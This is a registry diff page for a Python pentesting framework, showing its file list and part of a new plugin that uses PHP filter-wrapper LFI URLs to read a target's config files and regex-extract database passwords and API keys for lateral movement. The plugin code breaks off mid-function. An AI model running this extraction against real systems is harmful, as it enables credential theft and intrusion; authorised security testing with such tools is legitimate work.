souleyez 2.43.29__py3-none-any.whl → 3.0.0__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of souleyez might be problematic. Click here for more details.

Files changed (358) hide show
  1. souleyez/__init__.py +1 -2
  2. souleyez/ai/__init__.py +21 -15
  3. souleyez/ai/action_mapper.py +249 -150
  4. souleyez/ai/chain_advisor.py +116 -100
  5. souleyez/ai/claude_provider.py +29 -28
  6. souleyez/ai/context_builder.py +80 -62
  7. souleyez/ai/executor.py +158 -117
  8. souleyez/ai/feedback_handler.py +136 -121
  9. souleyez/ai/llm_factory.py +27 -20
  10. souleyez/ai/llm_provider.py +4 -2
  11. souleyez/ai/ollama_provider.py +6 -9
  12. souleyez/ai/ollama_service.py +44 -37
  13. souleyez/ai/path_scorer.py +91 -76
  14. souleyez/ai/recommender.py +176 -144
  15. souleyez/ai/report_context.py +74 -73
  16. souleyez/ai/report_service.py +84 -66
  17. souleyez/ai/result_parser.py +222 -229
  18. souleyez/ai/safety.py +67 -44
  19. souleyez/auth/__init__.py +23 -22
  20. souleyez/auth/audit.py +36 -26
  21. souleyez/auth/engagement_access.py +65 -48
  22. souleyez/auth/permissions.py +14 -3
  23. souleyez/auth/session_manager.py +54 -37
  24. souleyez/auth/user_manager.py +109 -64
  25. souleyez/commands/audit.py +40 -43
  26. souleyez/commands/auth.py +35 -15
  27. souleyez/commands/deliverables.py +55 -50
  28. souleyez/commands/engagement.py +47 -28
  29. souleyez/commands/license.py +32 -23
  30. souleyez/commands/screenshots.py +36 -32
  31. souleyez/commands/user.py +82 -36
  32. souleyez/config.py +52 -44
  33. souleyez/core/credential_tester.py +87 -81
  34. souleyez/core/cve_mappings.py +179 -192
  35. souleyez/core/cve_matcher.py +162 -148
  36. souleyez/core/msf_auto_mapper.py +100 -83
  37. souleyez/core/msf_chain_engine.py +294 -256
  38. souleyez/core/msf_database.py +153 -70
  39. souleyez/core/msf_integration.py +679 -673
  40. souleyez/core/msf_rpc_client.py +40 -42
  41. souleyez/core/msf_rpc_manager.py +77 -79
  42. souleyez/core/msf_sync_manager.py +241 -181
  43. souleyez/core/network_utils.py +22 -15
  44. souleyez/core/parser_handler.py +34 -25
  45. souleyez/core/pending_chains.py +114 -63
  46. souleyez/core/templates.py +158 -107
  47. souleyez/core/tool_chaining.py +9564 -2881
  48. souleyez/core/version_utils.py +79 -94
  49. souleyez/core/vuln_correlation.py +136 -89
  50. souleyez/core/web_utils.py +33 -32
  51. souleyez/data/wordlists/ad_users.txt +378 -0
  52. souleyez/data/wordlists/api_endpoints_large.txt +769 -0
  53. souleyez/data/wordlists/home_dir_sensitive.txt +39 -0
  54. souleyez/data/wordlists/lfi_payloads.txt +82 -0
  55. souleyez/data/wordlists/passwords_brute.txt +1548 -0
  56. souleyez/data/wordlists/passwords_crack.txt +2479 -0
  57. souleyez/data/wordlists/passwords_spray.txt +386 -0
  58. souleyez/data/wordlists/subdomains_large.txt +5057 -0
  59. souleyez/data/wordlists/usernames_common.txt +694 -0
  60. souleyez/data/wordlists/web_dirs_large.txt +4769 -0
  61. souleyez/detection/__init__.py +1 -1
  62. souleyez/detection/attack_signatures.py +12 -17
  63. souleyez/detection/mitre_mappings.py +61 -55
  64. souleyez/detection/validator.py +97 -86
  65. souleyez/devtools.py +23 -10
  66. souleyez/docs/README.md +4 -4
  67. souleyez/docs/api-reference/cli-commands.md +2 -2
  68. souleyez/docs/developer-guide/adding-new-tools.md +562 -0
  69. souleyez/docs/user-guide/auto-chaining.md +30 -8
  70. souleyez/docs/user-guide/getting-started.md +1 -1
  71. souleyez/docs/user-guide/installation.md +26 -3
  72. souleyez/docs/user-guide/metasploit-integration.md +2 -2
  73. souleyez/docs/user-guide/rbac.md +1 -1
  74. souleyez/docs/user-guide/scope-management.md +1 -1
  75. souleyez/docs/user-guide/siem-integration.md +1 -1
  76. souleyez/docs/user-guide/tools-reference.md +1 -8
  77. souleyez/docs/user-guide/worker-management.md +1 -1
  78. souleyez/engine/background.py +1239 -535
  79. souleyez/engine/base.py +4 -1
  80. souleyez/engine/job_status.py +17 -49
  81. souleyez/engine/log_sanitizer.py +103 -77
  82. souleyez/engine/manager.py +38 -7
  83. souleyez/engine/result_handler.py +2200 -1550
  84. souleyez/engine/worker_manager.py +50 -41
  85. souleyez/export/evidence_bundle.py +72 -62
  86. souleyez/feature_flags/features.py +16 -20
  87. souleyez/feature_flags.py +5 -9
  88. souleyez/handlers/__init__.py +11 -0
  89. souleyez/handlers/base.py +188 -0
  90. souleyez/handlers/bash_handler.py +277 -0
  91. souleyez/handlers/bloodhound_handler.py +243 -0
  92. souleyez/handlers/certipy_handler.py +311 -0
  93. souleyez/handlers/crackmapexec_handler.py +486 -0
  94. souleyez/handlers/dnsrecon_handler.py +344 -0
  95. souleyez/handlers/enum4linux_handler.py +400 -0
  96. souleyez/handlers/evil_winrm_handler.py +493 -0
  97. souleyez/handlers/ffuf_handler.py +815 -0
  98. souleyez/handlers/gobuster_handler.py +1114 -0
  99. souleyez/handlers/gpp_extract_handler.py +334 -0
  100. souleyez/handlers/hashcat_handler.py +444 -0
  101. souleyez/handlers/hydra_handler.py +564 -0
  102. souleyez/handlers/impacket_getuserspns_handler.py +343 -0
  103. souleyez/handlers/impacket_psexec_handler.py +222 -0
  104. souleyez/handlers/impacket_secretsdump_handler.py +426 -0
  105. souleyez/handlers/john_handler.py +286 -0
  106. souleyez/handlers/katana_handler.py +425 -0
  107. souleyez/handlers/kerbrute_handler.py +298 -0
  108. souleyez/handlers/ldapsearch_handler.py +636 -0
  109. souleyez/handlers/lfi_extract_handler.py +464 -0
  110. souleyez/handlers/msf_auxiliary_handler.py +409 -0
  111. souleyez/handlers/msf_exploit_handler.py +380 -0
  112. souleyez/handlers/nikto_handler.py +413 -0
  113. souleyez/handlers/nmap_handler.py +821 -0
  114. souleyez/handlers/nuclei_handler.py +359 -0
  115. souleyez/handlers/nxc_handler.py +417 -0
  116. souleyez/handlers/rdp_sec_check_handler.py +353 -0
  117. souleyez/handlers/registry.py +292 -0
  118. souleyez/handlers/responder_handler.py +232 -0
  119. souleyez/handlers/service_explorer_handler.py +434 -0
  120. souleyez/handlers/smbclient_handler.py +344 -0
  121. souleyez/handlers/smbmap_handler.py +510 -0
  122. souleyez/handlers/smbpasswd_handler.py +296 -0
  123. souleyez/handlers/sqlmap_handler.py +1116 -0
  124. souleyez/handlers/theharvester_handler.py +601 -0
  125. souleyez/handlers/web_login_test_handler.py +327 -0
  126. souleyez/handlers/whois_handler.py +277 -0
  127. souleyez/handlers/wpscan_handler.py +554 -0
  128. souleyez/history.py +32 -16
  129. souleyez/importers/msf_importer.py +106 -75
  130. souleyez/importers/smart_importer.py +208 -147
  131. souleyez/integrations/siem/__init__.py +10 -10
  132. souleyez/integrations/siem/base.py +17 -18
  133. souleyez/integrations/siem/elastic.py +108 -122
  134. souleyez/integrations/siem/factory.py +207 -80
  135. souleyez/integrations/siem/googlesecops.py +146 -154
  136. souleyez/integrations/siem/rule_mappings/__init__.py +1 -1
  137. souleyez/integrations/siem/rule_mappings/wazuh_rules.py +8 -5
  138. souleyez/integrations/siem/sentinel.py +107 -109
  139. souleyez/integrations/siem/splunk.py +246 -212
  140. souleyez/integrations/siem/wazuh.py +65 -71
  141. souleyez/integrations/wazuh/__init__.py +5 -5
  142. souleyez/integrations/wazuh/client.py +70 -93
  143. souleyez/integrations/wazuh/config.py +85 -57
  144. souleyez/integrations/wazuh/host_mapper.py +28 -36
  145. souleyez/integrations/wazuh/sync.py +78 -68
  146. souleyez/intelligence/__init__.py +4 -5
  147. souleyez/intelligence/correlation_analyzer.py +309 -295
  148. souleyez/intelligence/exploit_knowledge.py +661 -623
  149. souleyez/intelligence/exploit_suggestions.py +159 -139
  150. souleyez/intelligence/gap_analyzer.py +132 -97
  151. souleyez/intelligence/gap_detector.py +251 -214
  152. souleyez/intelligence/sensitive_tables.py +266 -129
  153. souleyez/intelligence/service_parser.py +137 -123
  154. souleyez/intelligence/surface_analyzer.py +407 -268
  155. souleyez/intelligence/target_parser.py +159 -162
  156. souleyez/licensing/__init__.py +6 -6
  157. souleyez/licensing/validator.py +17 -19
  158. souleyez/log_config.py +79 -54
  159. souleyez/main.py +1505 -687
  160. souleyez/migrations/fix_job_counter.py +16 -14
  161. souleyez/parsers/bloodhound_parser.py +41 -39
  162. souleyez/parsers/crackmapexec_parser.py +178 -111
  163. souleyez/parsers/dalfox_parser.py +72 -77
  164. souleyez/parsers/dnsrecon_parser.py +103 -91
  165. souleyez/parsers/enum4linux_parser.py +183 -153
  166. souleyez/parsers/ffuf_parser.py +29 -25
  167. souleyez/parsers/gobuster_parser.py +301 -41
  168. souleyez/parsers/hashcat_parser.py +324 -79
  169. souleyez/parsers/http_fingerprint_parser.py +350 -103
  170. souleyez/parsers/hydra_parser.py +131 -111
  171. souleyez/parsers/impacket_parser.py +231 -178
  172. souleyez/parsers/john_parser.py +98 -86
  173. souleyez/parsers/katana_parser.py +316 -0
  174. souleyez/parsers/msf_parser.py +943 -498
  175. souleyez/parsers/nikto_parser.py +346 -65
  176. souleyez/parsers/nmap_parser.py +262 -174
  177. souleyez/parsers/nuclei_parser.py +40 -44
  178. souleyez/parsers/responder_parser.py +26 -26
  179. souleyez/parsers/searchsploit_parser.py +74 -74
  180. souleyez/parsers/service_explorer_parser.py +279 -0
  181. souleyez/parsers/smbmap_parser.py +180 -124
  182. souleyez/parsers/sqlmap_parser.py +434 -308
  183. souleyez/parsers/theharvester_parser.py +75 -57
  184. souleyez/parsers/whois_parser.py +135 -94
  185. souleyez/parsers/wpscan_parser.py +278 -190
  186. souleyez/plugins/afp.py +44 -36
  187. souleyez/plugins/afp_brute.py +114 -46
  188. souleyez/plugins/ard.py +48 -37
  189. souleyez/plugins/bloodhound.py +95 -61
  190. souleyez/plugins/certipy.py +303 -0
  191. souleyez/plugins/crackmapexec.py +186 -85
  192. souleyez/plugins/dalfox.py +120 -59
  193. souleyez/plugins/dns_hijack.py +146 -41
  194. souleyez/plugins/dnsrecon.py +97 -61
  195. souleyez/plugins/enum4linux.py +91 -66
  196. souleyez/plugins/evil_winrm.py +291 -0
  197. souleyez/plugins/ffuf.py +166 -90
  198. souleyez/plugins/firmware_extract.py +133 -29
  199. souleyez/plugins/gobuster.py +387 -190
  200. souleyez/plugins/gpp_extract.py +393 -0
  201. souleyez/plugins/hashcat.py +100 -73
  202. souleyez/plugins/http_fingerprint.py +913 -267
  203. souleyez/plugins/hydra.py +566 -200
  204. souleyez/plugins/impacket_getnpusers.py +117 -69
  205. souleyez/plugins/impacket_psexec.py +84 -64
  206. souleyez/plugins/impacket_secretsdump.py +103 -69
  207. souleyez/plugins/impacket_smbclient.py +89 -75
  208. souleyez/plugins/john.py +86 -69
  209. souleyez/plugins/katana.py +313 -0
  210. souleyez/plugins/kerbrute.py +237 -0
  211. souleyez/plugins/lfi_extract.py +541 -0
  212. souleyez/plugins/macos_ssh.py +117 -48
  213. souleyez/plugins/mdns.py +35 -30
  214. souleyez/plugins/msf_auxiliary.py +253 -130
  215. souleyez/plugins/msf_exploit.py +239 -161
  216. souleyez/plugins/nikto.py +134 -78
  217. souleyez/plugins/nmap.py +275 -91
  218. souleyez/plugins/nuclei.py +180 -89
  219. souleyez/plugins/nxc.py +285 -0
  220. souleyez/plugins/plugin_base.py +35 -36
  221. souleyez/plugins/plugin_template.py +13 -5
  222. souleyez/plugins/rdp_sec_check.py +130 -0
  223. souleyez/plugins/responder.py +112 -71
  224. souleyez/plugins/router_http_brute.py +76 -65
  225. souleyez/plugins/router_ssh_brute.py +118 -41
  226. souleyez/plugins/router_telnet_brute.py +124 -42
  227. souleyez/plugins/routersploit.py +91 -59
  228. souleyez/plugins/routersploit_exploit.py +77 -55
  229. souleyez/plugins/searchsploit.py +91 -77
  230. souleyez/plugins/service_explorer.py +1160 -0
  231. souleyez/plugins/smbmap.py +122 -72
  232. souleyez/plugins/smbpasswd.py +215 -0
  233. souleyez/plugins/sqlmap.py +301 -113
  234. souleyez/plugins/theharvester.py +127 -75
  235. souleyez/plugins/tr069.py +79 -57
  236. souleyez/plugins/upnp.py +65 -47
  237. souleyez/plugins/upnp_abuse.py +73 -55
  238. souleyez/plugins/vnc_access.py +129 -42
  239. souleyez/plugins/vnc_brute.py +109 -38
  240. souleyez/plugins/web_login_test.py +417 -0
  241. souleyez/plugins/whois.py +77 -58
  242. souleyez/plugins/wpscan.py +219 -69
  243. souleyez/reporting/__init__.py +2 -1
  244. souleyez/reporting/attack_chain.py +411 -346
  245. souleyez/reporting/charts.py +436 -501
  246. souleyez/reporting/compliance_mappings.py +334 -201
  247. souleyez/reporting/detection_report.py +126 -125
  248. souleyez/reporting/formatters.py +828 -591
  249. souleyez/reporting/generator.py +386 -302
  250. souleyez/reporting/metrics.py +72 -75
  251. souleyez/scanner.py +35 -29
  252. souleyez/security/__init__.py +37 -11
  253. souleyez/security/scope_validator.py +175 -106
  254. souleyez/security/validation.py +237 -149
  255. souleyez/security.py +22 -6
  256. souleyez/storage/credentials.py +247 -186
  257. souleyez/storage/crypto.py +296 -129
  258. souleyez/storage/database.py +73 -50
  259. souleyez/storage/db.py +58 -36
  260. souleyez/storage/deliverable_evidence.py +177 -128
  261. souleyez/storage/deliverable_exporter.py +282 -246
  262. souleyez/storage/deliverable_templates.py +134 -116
  263. souleyez/storage/deliverables.py +135 -130
  264. souleyez/storage/engagements.py +109 -56
  265. souleyez/storage/evidence.py +181 -152
  266. souleyez/storage/execution_log.py +31 -17
  267. souleyez/storage/exploit_attempts.py +93 -57
  268. souleyez/storage/exploits.py +67 -36
  269. souleyez/storage/findings.py +48 -61
  270. souleyez/storage/hosts.py +176 -144
  271. souleyez/storage/migrate_to_engagements.py +43 -19
  272. souleyez/storage/migrations/_001_add_credential_enhancements.py +22 -12
  273. souleyez/storage/migrations/_002_add_status_tracking.py +10 -7
  274. souleyez/storage/migrations/_003_add_execution_log.py +14 -8
  275. souleyez/storage/migrations/_005_screenshots.py +13 -5
  276. souleyez/storage/migrations/_006_deliverables.py +13 -5
  277. souleyez/storage/migrations/_007_deliverable_templates.py +12 -7
  278. souleyez/storage/migrations/_008_add_nuclei_table.py +10 -4
  279. souleyez/storage/migrations/_010_evidence_linking.py +17 -10
  280. souleyez/storage/migrations/_011_timeline_tracking.py +20 -13
  281. souleyez/storage/migrations/_012_team_collaboration.py +34 -21
  282. souleyez/storage/migrations/_013_add_host_tags.py +12 -6
  283. souleyez/storage/migrations/_014_exploit_attempts.py +22 -10
  284. souleyez/storage/migrations/_015_add_mac_os_fields.py +15 -7
  285. souleyez/storage/migrations/_016_add_domain_field.py +10 -4
  286. souleyez/storage/migrations/_017_msf_sessions.py +16 -8
  287. souleyez/storage/migrations/_018_add_osint_target.py +10 -6
  288. souleyez/storage/migrations/_019_add_engagement_type.py +10 -6
  289. souleyez/storage/migrations/_020_add_rbac.py +36 -15
  290. souleyez/storage/migrations/_021_wazuh_integration.py +20 -8
  291. souleyez/storage/migrations/_022_wazuh_indexer_columns.py +6 -4
  292. souleyez/storage/migrations/_023_fix_detection_results_fk.py +16 -6
  293. souleyez/storage/migrations/_024_wazuh_vulnerabilities.py +26 -10
  294. souleyez/storage/migrations/_025_multi_siem_support.py +3 -5
  295. souleyez/storage/migrations/_026_add_engagement_scope.py +31 -12
  296. souleyez/storage/migrations/_027_multi_siem_persistence.py +32 -15
  297. souleyez/storage/migrations/__init__.py +26 -26
  298. souleyez/storage/migrations/migration_manager.py +19 -19
  299. souleyez/storage/msf_sessions.py +100 -65
  300. souleyez/storage/osint.py +17 -24
  301. souleyez/storage/recommendation_engine.py +269 -235
  302. souleyez/storage/screenshots.py +33 -32
  303. souleyez/storage/smb_shares.py +136 -92
  304. souleyez/storage/sqlmap_data.py +183 -128
  305. souleyez/storage/team_collaboration.py +135 -141
  306. souleyez/storage/timeline_tracker.py +122 -94
  307. souleyez/storage/wazuh_vulns.py +64 -66
  308. souleyez/storage/web_paths.py +33 -37
  309. souleyez/testing/credential_tester.py +221 -205
  310. souleyez/ui/__init__.py +1 -1
  311. souleyez/ui/ai_quotes.py +12 -12
  312. souleyez/ui/attack_surface.py +2439 -1516
  313. souleyez/ui/chain_rules_view.py +914 -382
  314. souleyez/ui/correlation_view.py +312 -230
  315. souleyez/ui/dashboard.py +2382 -1130
  316. souleyez/ui/deliverables_view.py +148 -62
  317. souleyez/ui/design_system.py +13 -13
  318. souleyez/ui/errors.py +49 -49
  319. souleyez/ui/evidence_linking_view.py +284 -179
  320. souleyez/ui/evidence_vault.py +393 -285
  321. souleyez/ui/exploit_suggestions_view.py +555 -349
  322. souleyez/ui/export_view.py +100 -66
  323. souleyez/ui/gap_analysis_view.py +315 -171
  324. souleyez/ui/help_system.py +105 -97
  325. souleyez/ui/intelligence_view.py +436 -293
  326. souleyez/ui/interactive.py +23034 -10679
  327. souleyez/ui/interactive_selector.py +75 -68
  328. souleyez/ui/log_formatter.py +47 -39
  329. souleyez/ui/menu_components.py +22 -13
  330. souleyez/ui/msf_auxiliary_menu.py +184 -133
  331. souleyez/ui/pending_chains_view.py +336 -172
  332. souleyez/ui/progress_indicators.py +5 -3
  333. souleyez/ui/recommendations_view.py +195 -137
  334. souleyez/ui/rule_builder.py +343 -225
  335. souleyez/ui/setup_wizard.py +678 -284
  336. souleyez/ui/shortcuts.py +217 -165
  337. souleyez/ui/splunk_gap_analysis_view.py +452 -270
  338. souleyez/ui/splunk_vulns_view.py +139 -86
  339. souleyez/ui/team_dashboard.py +498 -335
  340. souleyez/ui/template_selector.py +196 -105
  341. souleyez/ui/terminal.py +6 -6
  342. souleyez/ui/timeline_view.py +198 -127
  343. souleyez/ui/tool_setup.py +264 -164
  344. souleyez/ui/tutorial.py +202 -72
  345. souleyez/ui/tutorial_state.py +40 -40
  346. souleyez/ui/wazuh_vulns_view.py +235 -141
  347. souleyez/ui/wordlist_browser.py +260 -107
  348. souleyez/ui.py +464 -312
  349. souleyez/utils/tool_checker.py +427 -367
  350. souleyez/utils.py +33 -29
  351. souleyez/wordlists.py +134 -167
  352. {souleyez-2.43.29.dist-info → souleyez-3.0.0.dist-info}/METADATA +2 -2
  353. souleyez-3.0.0.dist-info/RECORD +443 -0
  354. {souleyez-2.43.29.dist-info → souleyez-3.0.0.dist-info}/WHEEL +1 -1
  355. souleyez-2.43.29.dist-info/RECORD +0 -379
  356. {souleyez-2.43.29.dist-info → souleyez-3.0.0.dist-info}/entry_points.txt +0 -0
  357. {souleyez-2.43.29.dist-info → souleyez-3.0.0.dist-info}/licenses/LICENSE +0 -0
  358. {souleyez-2.43.29.dist-info → souleyez-3.0.0.dist-info}/top_level.txt +0 -0
@@ -0,0 +1,541 @@
1
+ #!/usr/bin/env python3
2
+ """
3
+ souleyez.plugins.lfi_extract - Extract credentials from LFI vulnerabilities
4
+
5
+ A custom SoulEyez tool that:
6
+ 1. Takes PHP filter wrapper URLs discovered by FFUF LFI scans
7
+ 2. Fetches the base64-encoded source code
8
+ 3. Decodes and parses for credentials (database passwords, API keys, etc.)
9
+ 4. Stores extracted credentials in the credentials table
10
+
11
+ This is "glue" tooling - it bridges the gap between LFI discovery and
12
+ credential exploitation.
13
+ """
14
+ import base64
15
+ import json
16
+ import re
17
+ import time
18
+ import warnings
19
+ from typing import Any, Dict, List, Optional
20
+ from urllib.parse import urlparse
21
+
22
+ from .plugin_base import PluginBase
23
+
24
+ # Suppress SSL warnings for pentesting
25
+ warnings.filterwarnings("ignore", message="Unverified HTTPS request")
26
+
27
+ HELP = {
28
+ "name": "LFI Extract - Credential Extraction from LFI",
29
+ "description": (
30
+ "Extracts credentials from Local File Inclusion (LFI) vulnerabilities.\n\n"
31
+ "When PHP filter wrapper URLs are discovered (e.g., via FFUF LFI scan), "
32
+ "this tool fetches the base64-encoded source code, decodes it, and "
33
+ "parses for credentials.\n\n"
34
+ "Supported extraction:\n"
35
+ "- Database credentials (MySQL, PostgreSQL, etc.)\n"
36
+ "- API keys and tokens\n"
37
+ "- Configuration secrets\n"
38
+ "- WordPress wp-config.php credentials\n"
39
+ "- Laravel .env files\n"
40
+ ),
41
+ "usage": "souleyez jobs enqueue lfi_extract <url>",
42
+ "examples": [
43
+ "souleyez jobs enqueue lfi_extract 'http://target/?page=php://filter/convert.base64-encode/resource=config'",
44
+ "souleyez jobs enqueue lfi_extract --urls-file /tmp/lfi_urls.txt",
45
+ ],
46
+ "flags": [
47
+ ["--timeout <sec>", "Request timeout per URL (default: 10)"],
48
+ ["--urls-file <path>", "File containing URLs to extract (one per line)"],
49
+ ["--max-urls <n>", "Maximum URLs to process (default: 20)"],
50
+ ],
51
+ "presets": [
52
+ {"name": "Quick Extract", "args": [], "desc": "Extract from single URL"},
53
+ {
54
+ "name": "Batch Extract",
55
+ "args": ["--max-urls", "50"],
56
+ "desc": "Process up to 50 URLs",
57
+ },
58
+ ],
59
+ "help_sections": [
60
+ {
61
+ "title": "What is LFI Credential Extraction?",
62
+ "color": "cyan",
63
+ "content": [
64
+ (
65
+ "Overview",
66
+ [
67
+ "Extracts credentials from Local File Inclusion (LFI) vulnerabilities",
68
+ "Uses PHP filter wrappers to read source code as base64",
69
+ "Parses decoded content for database passwords, API keys, etc.",
70
+ ],
71
+ ),
72
+ (
73
+ "How LFI Works",
74
+ [
75
+ "LFI allows reading local files through web parameters",
76
+ "php://filter/convert.base64-encode bypasses PHP execution",
77
+ "Returns raw source code instead of executed output",
78
+ "Source code often contains hardcoded credentials",
79
+ ],
80
+ ),
81
+ ],
82
+ },
83
+ {
84
+ "title": "Usage & Examples",
85
+ "color": "green",
86
+ "content": [
87
+ (
88
+ "Single URL",
89
+ [
90
+ "souleyez jobs enqueue lfi_extract 'http://target/?page=php://filter/convert.base64-encode/resource=config'",
91
+ " → Fetches and decodes the config file",
92
+ ],
93
+ ),
94
+ (
95
+ "From FFUF Results",
96
+ [
97
+ "FFUF LFI scan finds vulnerable parameters",
98
+ "Auto-chain triggers lfi_extract on discovered URLs",
99
+ "Credentials automatically stored in database",
100
+ ],
101
+ ),
102
+ ],
103
+ },
104
+ {
105
+ "title": "What Gets Extracted",
106
+ "color": "yellow",
107
+ "content": [
108
+ (
109
+ "Credential Types",
110
+ [
111
+ "Database credentials (MySQL, PostgreSQL, SQLite)",
112
+ "WordPress wp-config.php (DB_USER, DB_PASSWORD)",
113
+ "Laravel .env files (DB_*, APP_KEY, API tokens)",
114
+ "API keys and tokens in config files",
115
+ ],
116
+ ),
117
+ (
118
+ "Common Target Files",
119
+ [
120
+ "config.php, settings.php, database.php",
121
+ "wp-config.php (WordPress)",
122
+ ".env (Laravel, Node.js)",
123
+ "includes/config.inc.php (many apps)",
124
+ ],
125
+ ),
126
+ ],
127
+ },
128
+ {
129
+ "title": "After Extraction",
130
+ "color": "magenta",
131
+ "content": [
132
+ (
133
+ "Next Steps",
134
+ [
135
+ "Credentials stored in SoulEyez database automatically",
136
+ "Try database creds on MySQL/PostgreSQL ports (3306, 5432)",
137
+ "Use extracted creds for lateral movement",
138
+ "Check if same password used for admin panels",
139
+ ],
140
+ ),
141
+ ],
142
+ },
143
+ ],
144
+ }
145
+
146
+ # Credential patterns to search for in decoded PHP/config files
147
+ CREDENTIAL_PATTERNS = [
148
+ # PHP variable assignments
149
+ (r'\$(?:password|passwd|pass|pwd)\s*=\s*["\']([^"\']+)["\']', "password"),
150
+ (r'\$(?:username|user|usr|login|db_user)\s*=\s*["\']([^"\']+)["\']', "username"),
151
+ (r'\$(?:database|db|dbname|db_name)\s*=\s*["\']([^"\']+)["\']', "database"),
152
+ (r'\$(?:server|host|hostname|db_host)\s*=\s*["\']([^"\']+)["\']', "host"),
153
+ # Array-style configs
154
+ (r'["\']password["\']\s*=>\s*["\']([^"\']+)["\']', "password"),
155
+ (r'["\']username["\']\s*=>\s*["\']([^"\']+)["\']', "username"),
156
+ (r'["\']user["\']\s*=>\s*["\']([^"\']+)["\']', "username"),
157
+ (r'["\']database["\']\s*=>\s*["\']([^"\']+)["\']', "database"),
158
+ (r'["\']host["\']\s*=>\s*["\']([^"\']+)["\']', "host"),
159
+ # WordPress defines
160
+ (r"define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)", "password"),
161
+ (r"define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)", "username"),
162
+ (r"define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)", "database"),
163
+ (r"define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)", "host"),
164
+ # Laravel/dotenv style
165
+ (r'DB_PASSWORD\s*=\s*["\']?([^"\'\s\n]+)["\']?', "password"),
166
+ (r'DB_USERNAME\s*=\s*["\']?([^"\'\s\n]+)["\']?', "username"),
167
+ (r'DB_DATABASE\s*=\s*["\']?([^"\'\s\n]+)["\']?', "database"),
168
+ (r'DB_HOST\s*=\s*["\']?([^"\'\s\n]+)["\']?', "host"),
169
+ # API keys and tokens
170
+ (
171
+ r'(?:api_key|apikey|api_secret|secret_key)\s*[=:]\s*["\']?([A-Za-z0-9_\-]{20,})["\']?',
172
+ "api_key",
173
+ ),
174
+ (
175
+ r'(?:AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|NONCE_KEY)\s*[=:]\s*["\']([^"\']+)["\']',
176
+ "secret_key",
177
+ ),
178
+ # Generic connection strings
179
+ (r"mysql://([^:]+):([^@]+)@([^/]+)/(\w+)", "connection_string"),
180
+ (r"postgresql://([^:]+):([^@]+)@([^/]+)/(\w+)", "connection_string"),
181
+ ]
182
+
183
+ # Files that commonly contain credentials
184
+ HIGH_VALUE_FILES = [
185
+ "config.php",
186
+ "configuration.php",
187
+ "settings.php",
188
+ "database.php",
189
+ "db.php",
190
+ "connect.php",
191
+ "connection.php",
192
+ "conn.php",
193
+ "wp-config.php",
194
+ "config.inc.php",
195
+ "db.inc.php",
196
+ ".env",
197
+ "env.php",
198
+ "environment.php",
199
+ ]
200
+
201
+
202
+ class LfiExtractPlugin(PluginBase):
203
+ """Custom SoulEyez tool for extracting credentials from LFI vulnerabilities."""
204
+
205
+ name = "LFI Extract"
206
+ tool = "lfi_extract"
207
+ category = "exploitation"
208
+ HELP = HELP
209
+
210
+ def build_command(
211
+ self, target: str, args: List[str] = None, label: str = "", log_path: str = None
212
+ ):
213
+ """
214
+ LFI extraction is done in Python, not via external command.
215
+ Return None to use run() method instead.
216
+ """
217
+ return None
218
+
219
+ def check_tool_available(self) -> bool:
220
+ """Built-in tool - always available."""
221
+ return True
222
+
223
+ def run(
224
+ self, target: str, args: List[str] = None, label: str = "", log_path: str = None
225
+ ) -> int:
226
+ """Execute LFI credential extraction."""
227
+ args = args or []
228
+ timeout = 10
229
+ max_urls = 20
230
+ urls_file = None
231
+
232
+ # Parse args
233
+ i = 0
234
+ while i < len(args):
235
+ if args[i] == "--timeout" and i + 1 < len(args):
236
+ try:
237
+ timeout = int(args[i + 1])
238
+ except ValueError:
239
+ pass
240
+ i += 2
241
+ elif args[i] == "--max-urls" and i + 1 < len(args):
242
+ try:
243
+ max_urls = int(args[i + 1])
244
+ except ValueError:
245
+ pass
246
+ i += 2
247
+ elif args[i] == "--urls-file" and i + 1 < len(args):
248
+ urls_file = args[i + 1]
249
+ i += 2
250
+ else:
251
+ i += 1
252
+
253
+ # Collect URLs to process
254
+ urls_to_process = []
255
+
256
+ # If urls_file provided, read from it
257
+ if urls_file:
258
+ try:
259
+ with open(urls_file, "r") as f:
260
+ for line in f:
261
+ line = line.strip()
262
+ if line and not line.startswith("#"):
263
+ urls_to_process.append(line)
264
+ except FileNotFoundError:
265
+ pass
266
+
267
+ # If target is a URL, add it
268
+ if target and target.startswith("http"):
269
+ urls_to_process.append(target)
270
+
271
+ # Filter to only PHP filter URLs
272
+ php_filter_urls = [
273
+ url
274
+ for url in urls_to_process
275
+ if "php://filter" in url and "base64-encode" in url
276
+ ]
277
+
278
+ # Prioritize config files
279
+ prioritized = []
280
+ other = []
281
+ for url in php_filter_urls:
282
+ url_lower = url.lower()
283
+ if any(hv in url_lower for hv in HIGH_VALUE_FILES):
284
+ prioritized.append(url)
285
+ else:
286
+ other.append(url)
287
+ urls_to_process = (prioritized + other)[:max_urls]
288
+
289
+ try:
290
+ result = self._extract_credentials(urls_to_process, timeout)
291
+ output = self._format_output(target, result, label, urls_to_process)
292
+
293
+ if log_path:
294
+ with open(log_path, "w", encoding="utf-8", errors="replace") as fh:
295
+ fh.write(output)
296
+ # Write JSON result for parsing
297
+ fh.write("\n\n=== JSON_RESULT ===\n")
298
+ fh.write(json.dumps(result, indent=2))
299
+ fh.write("\n=== END_JSON_RESULT ===\n")
300
+
301
+ return 0 if result.get("credentials") else 1
302
+
303
+ except Exception as e:
304
+ error_output = f"=== Plugin: LFI Extract ===\n"
305
+ error_output += f"Target: {target}\n"
306
+ error_output += f"Error: {type(e).__name__}: {e}\n"
307
+
308
+ if log_path:
309
+ with open(log_path, "w", encoding="utf-8", errors="replace") as fh:
310
+ fh.write(error_output)
311
+
312
+ return 1
313
+
314
+ def _extract_credentials(
315
+ self, urls: List[str], timeout: int = 10
316
+ ) -> Dict[str, Any]:
317
+ """
318
+ Fetch PHP filter URLs and extract credentials from decoded content.
319
+
320
+ Returns:
321
+ Dict containing:
322
+ - credentials: List of extracted credential dicts
323
+ - sources_processed: Number of URLs successfully processed
324
+ - sources_failed: Number of URLs that failed
325
+ - decoded_files: List of files that were decoded
326
+ """
327
+ import requests
328
+
329
+ result = {
330
